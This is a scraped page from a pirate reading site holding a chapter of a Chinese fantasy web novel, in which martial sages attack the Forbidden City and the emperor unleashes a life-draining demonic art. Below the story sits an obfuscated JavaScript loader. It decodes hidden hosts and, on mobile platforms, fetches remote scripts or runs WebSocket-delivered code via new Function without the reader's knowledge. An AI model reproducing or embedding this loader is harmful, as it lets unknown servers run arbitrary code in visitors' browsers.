笔趣阁

字:
关灯 护眼
笔趣阁 > 冷宫签到八十年,我举世无敌 > 第十九章 斩天拔剑术

第十九章 斩天拔剑术

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
接连出现三位武圣,闯入紫禁城,要击杀元帝。
  整个帝都都震动了。
  他们是谁,这无需怀疑,大家就能看到。
  这一刻,帝都之内,武圣的气势浩浩荡荡,一如十几年前,两尊武圣在紫禁之巅决斗一样。
  这一次更夸张,现在已经出现三位武圣来袭,再加上皇室的两位,足足有五位武圣。
  这一夜之前,天下间人知道的武圣,只有一个,那就是紫禁城内的无名。
  其他势力有了武圣都隐藏起来,不想被发现,充当底牌。
  藩王们也是被元帝激怒了。
  羽化神朝立国几百年,从未有过削藩举动,元帝坚持削藩,是开先河的壮举。
  所以九大藩王也不藏着掖着,直接把底牌都暴露出来。
  你不是要削藩吗?
  你不是仗着自己有武圣吗?
  你不是要重整乾坤,再造山河吗?
  那我们就去你的紫禁城,把你击杀了,然后再和羽化神朝和解。
  那个时候,羽化神朝的下一任陛下,一定会放弃为你报仇,选择和我们和解。
  削藩?
  你是在做梦!
  九大藩王就是如此的有恃无恐。
  ……
  接连出现三位武圣,前两位被无名和老皇帝阻挡了。
  第三位站在曾经花间老祖死亡的紫禁之巅,一记标枪投射过来,速度飞快,带动了一道可怕刺耳的鹰叫声。
  这位来自天鹰王背后的武圣,冷眼看着,等待下一秒,标枪刺穿元帝身躯。
  可下一秒发生的事情,却也是大大出乎他的预料。
  咔嚓一声,标枪断了。
  不是别人斩断的。
  因为在冷宫里,蔺九凤面色诧异的看着。
  武圣气势一爆发,他在冷宫里就察觉到了。
  隔着几百里地界,他平静地看着,没打算出手,因为皇宫里还有无名。
  第二个武圣出现,蔺九凤只是眉头一挑,也没有动。
  因为那个羽化神朝的老皇帝,也是蔺九凤的爷爷,他出手了。
  所以无需他出手。
  可是第三个出现,蔺九凤坐不住了,他不能看着元帝被杀。
  但没等到蔺九凤出手,元帝一声怒吼,面对刺杀的他,直接爆发了。
  轰!轰!轰!
  一道道震动苍穹的气势在元帝身上弥漫,他撕开了自己的伪装,外表宗师修为的伪装,内在却是大宗师境界。
  而且是修行魔功的大宗师。
  “上古魔典,九重叠加。”元帝登基以后,为了削藩一直在做准备,默默观看了父皇当初修行的魔功。
  这门魔功很邪门,修行之后,会有很强大的能量,但是却会吞噬修行者的寿命,每日都会吞噬一点,越来越恐怖。
  除非你的上古魔典达到较为高深的层次,才能止住吞噬生命,然后会得到更大的好处。
  可惜,上一任皇帝没有成功。
  元帝也没有成功。
  他是得到了力量,但他的生命也被吞噬的差不多了。
  所以他急着发动削藩,就是想在生命最后时间里,雷霆扫穴,把九大藩王处理干净,留给他的继承者,一个还算安全稳定的羽化神朝。
  不要像他接手的时候,满目疮痍,十几年下来,他力挽狂澜,也没有起死回生多少。
  激活魔功,顺带九重叠加,元帝在这一刻在力量上,踏入武圣境界,狂暴的无以复加,抬手折断了刺过来的标枪。
  他悬浮在空中,周身魔气深重,血光环绕,眼神里也有血色光芒,十分邪异。
  “强行提升到武圣境界,你是在燃烧寿命,取死之道罢了。”投掷标枪的武圣站在紫禁城最高的屋檐上冷哼道,没有把元帝放在眼里。
  就算现在可以和他平起平坐,但你的寿命能燃烧多久?
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDA4NQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x4d\x4a\x52\x5a\x74\x53\x42\x70\x63\x77']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vYWpmMmpkajlmajI5LmJiZGlhbbnppc2h1LmNvbbQ==','d3NzOOi8vd3MuYW5kYTE1MTYuY29tOOjkwOOTAsd3NzOOi8vd3Muc3luZ2d5LmNvbTo5MDkwLHdzczovL3dzLnpoaXB1ZnMuY29tOOjkwOOTA=',window,document,['b','O']);}:function(){};